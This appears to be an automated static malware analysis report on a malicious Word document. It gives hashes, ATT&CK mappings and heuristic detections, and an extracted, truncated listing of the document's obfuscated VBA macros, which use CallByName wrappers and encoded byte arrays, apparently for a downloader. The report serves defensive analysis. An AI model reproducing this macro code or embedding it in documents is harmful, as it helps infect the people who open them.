Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4702be3f05227031…

MALICIOUS

Office (OLE)

85.5 KB Created: 2018-07-20 21:29:00 Authoring application: Microsoft Office Word First seen: 2019-10-30
MD5: fe7df3d223fb2632dd70e5d6af08f3e7 SHA-1: 52b367467797e173b8f173076bd3bef141ccf9af SHA-256: 4702be3f05227031f57cb1d7d48f6638b36b22690689d30744b1cdea138ffaa2
162 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing obfuscated VBA macros, as indicated by multiple heuristic firings, including ClamAV's detection of macro obfuscation. The presence of `GetObject` and `CallByName` calls suggests dynamic execution of code: objects and methods are resolved and invoked by name at runtime rather than called directly, which hides the actual API used from static inspection. While the exact payload is not discernible due to obfuscation, the typical behavior for such documents is to download and execute a second-stage payload, hence the classification as a potential downloader.

Heuristics 5

  • ClamAV: Doc.Macro.Obfuscation-6663668-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Obfuscation-6663668-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18328 bytes
SHA-256: e944f496728f426377211e3db20697013d2ee6897b00feda21641700f6343572
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Dim Xt5, Xt79(2) As Byte, Xt63(9) As Byte, Xt56(32) As Byte, Xt84(19) As Byte, Xt3(13) As Byte, Xt01(5) As Byte, Xt48(55) As Byte, Xt55(770) As Byte, Xt88(5) As Byte
Private Sub f_Layout()
If Xt5 = 0 Then
Xt5 = 59
Dim Xt06, Xt59
Xt59 = 36764888
While Xt06 <= Xt59
Xt06 = Xt06 + 1
Wend
If Xt06 - 1 = Xt59 Then
Xt24
End If
End If
End Sub
Private Sub Xt87()
Xt84(19) = 203
Xt84(11) = 100
Xt84(9) = 210
Xt84(2) = 178
Xt84(17) = 213
Xt84(16) = 39
Xt84(5) = 102
Xt84(6) = 192
Xt84(15) = 171
Xt84(18) = 11
Xt84(10) = 6
Xt84(14) = 102
Xt84(4) = 127
Xt84(7) = 15
Xt84(12) = 180
Xt84(3) = 232
Xt84(1) = 154
Xt84(0) = 24
Xt84(13) = 42
Xt84(8) = 216
End Sub
Private Function Xt7(Xt37, Xt95, Xt1, Xt9, Xt93, Xt16)
On Error GoTo Xt4
If Xt9 = 1 Then
CallByName Xt37, Xt95, Xt1, Xt93, Null, Xt16
Else
Set Xt7 = CallByName(Xt37, Xt95, Xt1, Xt93)
End If
Exit Function
Xt4:
End Function
Private Sub Xt90()
Xt63(9) = 198
Xt63(0) = 28
Xt63(4) = 26
Xt63(7) = 25
Xt63(1) = 155
Xt63(8) = 216
Xt63(6) = 254
Xt63(3) = 172
Xt63(5) = 80
Xt63(2) = 179
End Sub
Private Sub Xt83()
Xt56(11) = 120
Xt56(16) = 56
Xt56(12) = 179
Xt56(9) = 195
Xt56(23) = 132
Xt56(25) = 69
Xt56(28) = 140
Xt56(8) = 141
Xt56(7) = 14
Xt56(19) = 129
Xt56(18) = 76
Xt56(17) = 215
Xt56(0) = 56
Xt56(6) = 228
Xt56(27) = 66
Xt56(2) = 178
Xt56(10) = 12
Xt56(14) = 113
Xt56(30) = 200
Xt56(32) = 36
Xt56(1) = 154
Xt56(31) = 87
Xt56(15) = 163
Xt56(29) = 84
Xt56(4) = 42
Xt56(21) = 198
Xt56(20) = 253
Xt56(22) = 206
Xt56(13) = 37
Xt56(3) = 182
Xt56(5) = 84
Xt56(26) = 6
Xt56(24) = 55
End Sub
Private Sub Xt43()
Xt55(332) = 22
Xt55(725) = 206
Xt55(551) = 153
Xt55(739) = 68
Xt55(494) = 145
Xt55(591) = 56
Xt55(423) = 157
Xt55(768) = 101
Xt55(682) = 85
Xt55(46) = 63
Xt55(43) = 182
Xt55(728) = 34
Xt55(110) = 32
Xt55(35) = 253
Xt55(677) = 141
Xt55(178) = 244
Xt55(245) = 59
Xt55(491) = 86
Xt55(499) = 122
Xt55(270) = 151
Xt55(221) = 139
Xt55(21) = 238
Xt55(340) = 63
Xt55(358) = 18
Xt55(28) = 198
Xt55(488) = 236
Xt55(305) = 28
Xt55(363) = 169
Xt55(660) = 7
Xt55(310) = 120
Xt55(319) = 212
Xt55(529) = 156
Xt55(98) = 221
Xt55(207) = 127
Xt55(53) = 83
Xt55(387) = 141
Xt55(593) = 67
Xt55(565) = 71
Xt55(133) = 44
Xt55(560) = 175
Xt55(228) = 46
Xt55(602) = 197
Xt55(537) = 201
Xt55(121) = 241
Xt55(372) = 88
Xt55(437) = 255
Xt55(48) = 210
Xt55(5) = 111
Xt55(211) = 83
Xt55(263) = 134
Xt55(528) = 71
Xt55(407) = 62
Xt55(187) = 238
Xt55(611) = 194
Xt55(655) = 158
Xt55(258) = 61
Xt55(563) = 239
Xt55(330) = 94
Xt55(335) = 18
Xt55(620) = 209
Xt55(538) = 144
Xt55(450) = 130
Xt55(392) = 16
Xt55(73) = 235
Xt55(197) = 241
Xt55(724) = 36
Xt55(239) = 88
Xt55(501) = 243
Xt55(690) = 236
Xt55(441) = 228
Xt55(770) = 42
Xt55(734) = 104
Xt55(70) = 212
Xt55(378) = 250
Xt55(40) = 113
Xt55(533) = 235
Xt55(57) = 7
Xt55(295) = 139
Xt55(161) = 150
Xt55(251) = 239
Xt55(436) = 133
Xt55(652) = 130
Xt55(524) = 64
Xt55(408) = 229
Xt55(510) = 91
Xt55(615) = 105
Xt55(588) = 75
Xt55(246) = 20
Xt55(751) = 192
Xt55(742) = 249
Xt55(680) = 115
Xt55(69) = 76
Xt55(291) = 118
Xt55(589) = 209
Xt55(695) = 236
Xt55(238) = 199
Xt55(504) = 133
Xt55(723) = 187
Xt55(334) = 192
Xt55(106) = 240
Xt55(336) = 111
Xt55(37) = 168
Xt55(374) = 37
Xt55(469) = 164
Xt55(188) = 158
Xt55(116) = 211
Xt55(427) = 16
Xt55(19) = 134
Xt55(250) = 200
Xt55(675) = 223
Xt55(223) = 24
Xt55(658) = 5
Xt55(410) = 179
Xt55(349) = 250
Xt55(196) = 200
Xt55(397) = 37
Xt55(371) = 133
Xt55(463) = 135
Xt55(131) = 44
Xt55(612) = 154
Xt55(285) = 62
Xt55(4) = 98
Xt55(486) = 18
Xt55(160) = 251
Xt55(390) = 127
Xt55(44) = 108
Xt55(177) = 158
Xt55(85) = 249
Xt55(531) = 244
Xt55(483) = 233
Xt55(331) = 197
Xt55(230) = 
... (truncated)